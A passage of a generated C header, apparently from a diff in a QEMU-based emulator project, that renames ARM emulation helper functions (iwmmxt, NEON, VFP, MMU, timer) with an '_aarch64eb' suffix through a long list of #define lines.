gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_aarch64eb +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_aarch64eb +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_aarch64eb +#define 
gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_aarch64eb +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_aarch64eb +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_aarch64eb +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_aarch64eb +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_aarch64eb +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_aarch64eb +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_aarch64eb +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_aarch64eb +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_aarch64eb +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_aarch64eb +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_aarch64eb +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_aarch64eb +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_aarch64eb +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_aarch64eb +#define 
gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_aarch64eb +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_aarch64eb +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_aarch64eb +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_aarch64eb +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_aarch64eb +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_aarch64eb +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_aarch64eb +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_aarch64eb +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_aarch64eb +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_aarch64eb +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_aarch64eb +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_aarch64eb +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_aarch64eb +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_aarch64eb +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_aarch64eb +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_aarch64eb +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_aarch64eb +#define gen_op_iwmmxt_unpackhw_M0_wRn 
gen_op_iwmmxt_unpackhw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_aarch64eb +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_aarch64eb +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_aarch64eb +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_aarch64eb +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_aarch64eb +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_aarch64eb +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_aarch64eb +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_aarch64eb +#define gen_rev16 gen_rev16_aarch64eb +#define gen_revsh gen_revsh_aarch64eb +#define gen_rfe gen_rfe_aarch64eb +#define gen_sar gen_sar_aarch64eb +#define gen_sbc_CC gen_sbc_CC_aarch64eb +#define gen_sbfx gen_sbfx_aarch64eb +#define gen_set_CF_bit31 gen_set_CF_bit31_aarch64eb +#define gen_set_condexec gen_set_condexec_aarch64eb +#define gen_set_cpsr gen_set_cpsr_aarch64eb +#define gen_set_label gen_set_label_aarch64eb +#define gen_set_pc_im gen_set_pc_im_aarch64eb +#define gen_set_psr gen_set_psr_aarch64eb +#define gen_set_psr_im gen_set_psr_im_aarch64eb +#define gen_shl gen_shl_aarch64eb +#define gen_shr gen_shr_aarch64eb +#define gen_smc gen_smc_aarch64eb +#define gen_smul_dual gen_smul_dual_aarch64eb +#define gen_srs gen_srs_aarch64eb +#define gen_ss_advance gen_ss_advance_aarch64eb +#define gen_step_complete_exception gen_step_complete_exception_aarch64eb +#define gen_store_exclusive gen_store_exclusive_aarch64eb +#define gen_storeq_reg gen_storeq_reg_aarch64eb +#define gen_sub_carry gen_sub_carry_aarch64eb +#define gen_sub_CC gen_sub_CC_aarch64eb +#define gen_subq_msw gen_subq_msw_aarch64eb +#define gen_swap_half gen_swap_half_aarch64eb +#define gen_thumb2_data_op 
gen_thumb2_data_op_aarch64eb +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_aarch64eb +#define gen_ubfx gen_ubfx_aarch64eb +#define gen_vfp_abs gen_vfp_abs_aarch64eb +#define gen_vfp_add gen_vfp_add_aarch64eb +#define gen_vfp_cmp gen_vfp_cmp_aarch64eb +#define gen_vfp_cmpe gen_vfp_cmpe_aarch64eb +#define gen_vfp_div gen_vfp_div_aarch64eb +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_aarch64eb +#define gen_vfp_F1_mul gen_vfp_F1_mul_aarch64eb +#define gen_vfp_F1_neg gen_vfp_F1_neg_aarch64eb +#define gen_vfp_ld gen_vfp_ld_aarch64eb +#define gen_vfp_mrs gen_vfp_mrs_aarch64eb +#define gen_vfp_msr gen_vfp_msr_aarch64eb +#define gen_vfp_mul gen_vfp_mul_aarch64eb +#define gen_vfp_neg gen_vfp_neg_aarch64eb +#define gen_vfp_shto gen_vfp_shto_aarch64eb +#define gen_vfp_sito gen_vfp_sito_aarch64eb +#define gen_vfp_slto gen_vfp_slto_aarch64eb +#define gen_vfp_sqrt gen_vfp_sqrt_aarch64eb +#define gen_vfp_st gen_vfp_st_aarch64eb +#define gen_vfp_sub gen_vfp_sub_aarch64eb +#define gen_vfp_tosh gen_vfp_tosh_aarch64eb +#define gen_vfp_tosi gen_vfp_tosi_aarch64eb +#define gen_vfp_tosiz gen_vfp_tosiz_aarch64eb +#define gen_vfp_tosl gen_vfp_tosl_aarch64eb +#define gen_vfp_touh gen_vfp_touh_aarch64eb +#define gen_vfp_toui gen_vfp_toui_aarch64eb +#define gen_vfp_touiz gen_vfp_touiz_aarch64eb +#define gen_vfp_toul gen_vfp_toul_aarch64eb +#define gen_vfp_uhto gen_vfp_uhto_aarch64eb +#define gen_vfp_uito gen_vfp_uito_aarch64eb +#define gen_vfp_ulto gen_vfp_ulto_aarch64eb +#define get_arm_cp_reginfo get_arm_cp_reginfo_aarch64eb +#define get_clock get_clock_aarch64eb +#define get_clock_realtime get_clock_realtime_aarch64eb +#define get_constraint_priority get_constraint_priority_aarch64eb +#define get_float_exception_flags get_float_exception_flags_aarch64eb +#define get_float_rounding_mode get_float_rounding_mode_aarch64eb +#define get_fpstatus_ptr get_fpstatus_ptr_aarch64eb +#define get_level1_table_address get_level1_table_address_aarch64eb +#define get_mem_index 
get_mem_index_aarch64eb +#define get_next_param_value get_next_param_value_aarch64eb +#define get_opt_name get_opt_name_aarch64eb +#define get_opt_value get_opt_value_aarch64eb +#define get_page_addr_code get_page_addr_code_aarch64eb +#define get_param_value get_param_value_aarch64eb +#define get_phys_addr get_phys_addr_aarch64eb +#define get_phys_addr_lpae get_phys_addr_lpae_aarch64eb +#define get_phys_addr_mpu get_phys_addr_mpu_aarch64eb +#define get_phys_addr_v5 get_phys_addr_v5_aarch64eb +#define get_phys_addr_v6 get_phys_addr_v6_aarch64eb +#define get_system_memory get_system_memory_aarch64eb +#define get_ticks_per_sec get_ticks_per_sec_aarch64eb +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_aarch64eb +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__aarch64eb +#define gt_cntfrq_access gt_cntfrq_access_aarch64eb +#define gt_cnt_read gt_cnt_read_aarch64eb +#define gt_cnt_reset gt_cnt_reset_aarch64eb +#define gt_counter_access gt_counter_access_aarch64eb +#define gt_ctl_write gt_ctl_write_aarch64eb +#define gt_cval_write gt_cval_write_aarch64eb +#define gt_get_countervalue gt_get_countervalue_aarch64eb +#define gt_pct_access gt_pct_access_aarch64eb +#define gt_ptimer_access gt_ptimer_access_aarch64eb +#define gt_recalc_timer gt_recalc_timer_aarch64eb +#define gt_timer_access gt_timer_access_aarch64eb +#define gt_tval_read gt_tval_read_aarch64eb +#define gt_tval_write gt_tval_write_aarch64eb +#define gt_vct_access gt_vct_access_aarch64eb +#define gt_vtimer_access gt_vtimer_access_aarch64eb +#define guest_phys_blocks_free guest_phys_blocks_free_aarch64eb +#define guest_phys_blocks_init guest_phys_blocks_init_aarch64eb +#define handle_vcvt handle_vcvt_aarch64eb +#define handle_vminmaxnm handle_vminmaxnm_aarch64eb +#define handle_vrint handle_vrint_aarch64eb +#define handle_vsel handle_vsel_aarch64eb +#define has_help_option has_help_option_aarch64eb +#define have_bmi1 have_bmi1_aarch64eb +#define have_bmi2 have_bmi2_aarch64eb +#define 
hcr_write hcr_write_aarch64eb +#define helper_access_check_cp_reg helper_access_check_cp_reg_aarch64eb +#define helper_add_saturate helper_add_saturate_aarch64eb +#define helper_add_setq helper_add_setq_aarch64eb +#define helper_add_usaturate helper_add_usaturate_aarch64eb +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_aarch64eb +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_aarch64eb +#define helper_be_ldq_mmu helper_be_ldq_mmu_aarch64eb +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_aarch64eb +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_aarch64eb +#define helper_be_ldul_mmu helper_be_ldul_mmu_aarch64eb +#define helper_be_lduw_mmu helper_be_lduw_mmu_aarch64eb +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_aarch64eb +#define helper_be_stl_mmu helper_be_stl_mmu_aarch64eb +#define helper_be_stq_mmu helper_be_stq_mmu_aarch64eb +#define helper_be_stw_mmu helper_be_stw_mmu_aarch64eb +#define helper_clear_pstate_ss helper_clear_pstate_ss_aarch64eb +#define helper_clz_arm helper_clz_arm_aarch64eb +#define helper_cpsr_read helper_cpsr_read_aarch64eb +#define helper_cpsr_write helper_cpsr_write_aarch64eb +#define helper_crc32_arm helper_crc32_arm_aarch64eb +#define helper_crc32c helper_crc32c_aarch64eb +#define helper_crypto_aese helper_crypto_aese_aarch64eb +#define helper_crypto_aesmc helper_crypto_aesmc_aarch64eb +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_aarch64eb +#define helper_crypto_sha1h helper_crypto_sha1h_aarch64eb +#define helper_crypto_sha1su1 helper_crypto_sha1su1_aarch64eb +#define helper_crypto_sha256h helper_crypto_sha256h_aarch64eb +#define helper_crypto_sha256h2 helper_crypto_sha256h2_aarch64eb +#define helper_crypto_sha256su0 helper_crypto_sha256su0_aarch64eb +#define helper_crypto_sha256su1 helper_crypto_sha256su1_aarch64eb +#define helper_dc_zva helper_dc_zva_aarch64eb +#define helper_double_saturate helper_double_saturate_aarch64eb +#define helper_exception_internal helper_exception_internal_aarch64eb +#define helper_exception_return 
helper_exception_return_aarch64eb +#define helper_exception_with_syndrome helper_exception_with_syndrome_aarch64eb +#define helper_get_cp_reg helper_get_cp_reg_aarch64eb +#define helper_get_cp_reg64 helper_get_cp_reg64_aarch64eb +#define helper_get_r13_banked helper_get_r13_banked_aarch64eb +#define helper_get_user_reg helper_get_user_reg_aarch64eb +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_aarch64eb +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_aarch64eb +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_aarch64eb +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_aarch64eb +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_aarch64eb +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_aarch64eb +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_aarch64eb +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_aarch64eb +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_aarch64eb +#define helper_iwmmxt_addub helper_iwmmxt_addub_aarch64eb +#define helper_iwmmxt_addul helper_iwmmxt_addul_aarch64eb +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_aarch64eb +#define helper_iwmmxt_align helper_iwmmxt_align_aarch64eb +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_aarch64eb +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_aarch64eb +#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_aarch64eb +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_aarch64eb +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_aarch64eb +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_aarch64eb +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_aarch64eb +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_aarch64eb +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_aarch64eb +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_aarch64eb +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_aarch64eb +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_aarch64eb +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_aarch64eb +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_aarch64eb +#define helper_iwmmxt_cmpgtul 
helper_iwmmxt_cmpgtul_aarch64eb +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_aarch64eb +#define helper_iwmmxt_insr helper_iwmmxt_insr_aarch64eb +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_aarch64eb +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_aarch64eb +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_aarch64eb +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_aarch64eb +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_aarch64eb +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_aarch64eb +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_aarch64eb +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_aarch64eb +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_aarch64eb +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_aarch64eb +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_aarch64eb +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_aarch64eb +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_aarch64eb +#define helper_iwmmxt_minub helper_iwmmxt_minub_aarch64eb +#define helper_iwmmxt_minul helper_iwmmxt_minul_aarch64eb +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_aarch64eb +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_aarch64eb +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_aarch64eb +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_aarch64eb +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_aarch64eb +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_aarch64eb +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_aarch64eb +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_aarch64eb +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_aarch64eb +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_aarch64eb +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_aarch64eb +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_aarch64eb +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_aarch64eb +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_aarch64eb +#define helper_iwmmxt_packul helper_iwmmxt_packul_aarch64eb +#define helper_iwmmxt_packuq 
helper_iwmmxt_packuq_aarch64eb +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_aarch64eb +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_aarch64eb +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_aarch64eb +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_aarch64eb +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_aarch64eb +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_aarch64eb +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_aarch64eb +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_aarch64eb +#define helper_iwmmxt_slll helper_iwmmxt_slll_aarch64eb +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_aarch64eb +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_aarch64eb +#define helper_iwmmxt_sral helper_iwmmxt_sral_aarch64eb +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_aarch64eb +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_aarch64eb +#define helper_iwmmxt_srll helper_iwmmxt_srll_aarch64eb +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_aarch64eb +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_aarch64eb +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_aarch64eb +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_aarch64eb +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_aarch64eb +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_aarch64eb +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_aarch64eb +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_aarch64eb +#define helper_iwmmxt_subub helper_iwmmxt_subub_aarch64eb +#define helper_iwmmxt_subul helper_iwmmxt_subul_aarch64eb +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_aarch64eb +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_aarch64eb +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_aarch64eb +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_aarch64eb +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_aarch64eb +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_aarch64eb +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_aarch64eb +#define helper_iwmmxt_unpackhul 
helper_iwmmxt_unpackhul_aarch64eb +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_aarch64eb +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_aarch64eb +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_aarch64eb +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_aarch64eb +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_aarch64eb +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_aarch64eb +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_aarch64eb +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_aarch64eb +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_aarch64eb +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_aarch64eb +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_aarch64eb +#define helper_ldb_cmmu helper_ldb_cmmu_aarch64eb +#define helper_ldb_mmu helper_ldb_mmu_aarch64eb +#define helper_ldl_cmmu helper_ldl_cmmu_aarch64eb +#define helper_ldl_mmu helper_ldl_mmu_aarch64eb +#define helper_ldq_cmmu helper_ldq_cmmu_aarch64eb +#define helper_ldq_mmu helper_ldq_mmu_aarch64eb +#define helper_ldw_cmmu helper_ldw_cmmu_aarch64eb +#define helper_ldw_mmu helper_ldw_mmu_aarch64eb +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_aarch64eb +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_aarch64eb +#define helper_le_ldq_mmu helper_le_ldq_mmu_aarch64eb +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_aarch64eb +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_aarch64eb +#define helper_le_ldul_mmu helper_le_ldul_mmu_aarch64eb +#define helper_le_lduw_mmu helper_le_lduw_mmu_aarch64eb +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_aarch64eb +#define helper_le_stl_mmu helper_le_stl_mmu_aarch64eb +#define helper_le_stq_mmu helper_le_stq_mmu_aarch64eb +#define helper_le_stw_mmu helper_le_stw_mmu_aarch64eb +#define helper_msr_i_pstate helper_msr_i_pstate_aarch64eb +#define helper_neon_abd_f32 helper_neon_abd_f32_aarch64eb +#define helper_neon_abdl_s16 helper_neon_abdl_s16_aarch64eb +#define helper_neon_abdl_s32 
helper_neon_abdl_s32_aarch64eb +#define helper_neon_abdl_s64 helper_neon_abdl_s64_aarch64eb +#define helper_neon_abdl_u16 helper_neon_abdl_u16_aarch64eb +#define helper_neon_abdl_u32 helper_neon_abdl_u32_aarch64eb +#define helper_neon_abdl_u64 helper_neon_abdl_u64_aarch64eb +#define helper_neon_abd_s16 helper_neon_abd_s16_aarch64eb +#define helper_neon_abd_s32 helper_neon_abd_s32_aarch64eb +#define helper_neon_abd_s8 helper_neon_abd_s8_aarch64eb +#define helper_neon_abd_u16 helper_neon_abd_u16_aarch64eb +#define helper_neon_abd_u32 helper_neon_abd_u32_aarch64eb +#define helper_neon_abd_u8 helper_neon_abd_u8_aarch64eb +#define helper_neon_abs_s16 helper_neon_abs_s16_aarch64eb +#define helper_neon_abs_s8 helper_neon_abs_s8_aarch64eb +#define helper_neon_acge_f32 helper_neon_acge_f32_aarch64eb +#define helper_neon_acge_f64 helper_neon_acge_f64_aarch64eb +#define helper_neon_acgt_f32 helper_neon_acgt_f32_aarch64eb +#define helper_neon_acgt_f64 helper_neon_acgt_f64_aarch64eb +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_aarch64eb +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_aarch64eb +#define helper_neon_addl_u16 helper_neon_addl_u16_aarch64eb +#define helper_neon_addl_u32 helper_neon_addl_u32_aarch64eb +#define helper_neon_add_u16 helper_neon_add_u16_aarch64eb +#define helper_neon_add_u8 helper_neon_add_u8_aarch64eb +#define helper_neon_ceq_f32 helper_neon_ceq_f32_aarch64eb +#define helper_neon_ceq_u16 helper_neon_ceq_u16_aarch64eb +#define helper_neon_ceq_u32 helper_neon_ceq_u32_aarch64eb +#define helper_neon_ceq_u8 helper_neon_ceq_u8_aarch64eb +#define helper_neon_cge_f32 helper_neon_cge_f32_aarch64eb +#define helper_neon_cge_s16 helper_neon_cge_s16_aarch64eb +#define helper_neon_cge_s32 helper_neon_cge_s32_aarch64eb +#define helper_neon_cge_s8 helper_neon_cge_s8_aarch64eb +#define helper_neon_cge_u16 helper_neon_cge_u16_aarch64eb +#define helper_neon_cge_u32 helper_neon_cge_u32_aarch64eb +#define helper_neon_cge_u8 
helper_neon_cge_u8_aarch64eb +#define helper_neon_cgt_f32 helper_neon_cgt_f32_aarch64eb +#define helper_neon_cgt_s16 helper_neon_cgt_s16_aarch64eb +#define helper_neon_cgt_s32 helper_neon_cgt_s32_aarch64eb +#define helper_neon_cgt_s8 helper_neon_cgt_s8_aarch64eb +#define helper_neon_cgt_u16 helper_neon_cgt_u16_aarch64eb +#define helper_neon_cgt_u32 helper_neon_cgt_u32_aarch64eb +#define helper_neon_cgt_u8 helper_neon_cgt_u8_aarch64eb +#define helper_neon_cls_s16 helper_neon_cls_s16_aarch64eb +#define helper_neon_cls_s32 helper_neon_cls_s32_aarch64eb +#define helper_neon_cls_s8 helper_neon_cls_s8_aarch64eb +#define helper_neon_clz_u16 helper_neon_clz_u16_aarch64eb +#define helper_neon_clz_u8 helper_neon_clz_u8_aarch64eb +#define helper_neon_cnt_u8 helper_neon_cnt_u8_aarch64eb +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_aarch64eb +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_aarch64eb +#define helper_neon_hadd_s16 helper_neon_hadd_s16_aarch64eb +#define helper_neon_hadd_s32 helper_neon_hadd_s32_aarch64eb +#define helper_neon_hadd_s8 helper_neon_hadd_s8_aarch64eb +#define helper_neon_hadd_u16 helper_neon_hadd_u16_aarch64eb +#define helper_neon_hadd_u32 helper_neon_hadd_u32_aarch64eb +#define helper_neon_hadd_u8 helper_neon_hadd_u8_aarch64eb +#define helper_neon_hsub_s16 helper_neon_hsub_s16_aarch64eb +#define helper_neon_hsub_s32 helper_neon_hsub_s32_aarch64eb +#define helper_neon_hsub_s8 helper_neon_hsub_s8_aarch64eb +#define helper_neon_hsub_u16 helper_neon_hsub_u16_aarch64eb +#define helper_neon_hsub_u32 helper_neon_hsub_u32_aarch64eb +#define helper_neon_hsub_u8 helper_neon_hsub_u8_aarch64eb +#define helper_neon_max_s16 helper_neon_max_s16_aarch64eb +#define helper_neon_max_s32 helper_neon_max_s32_aarch64eb +#define helper_neon_max_s8 helper_neon_max_s8_aarch64eb +#define helper_neon_max_u16 helper_neon_max_u16_aarch64eb +#define helper_neon_max_u32 helper_neon_max_u32_aarch64eb +#define helper_neon_max_u8 
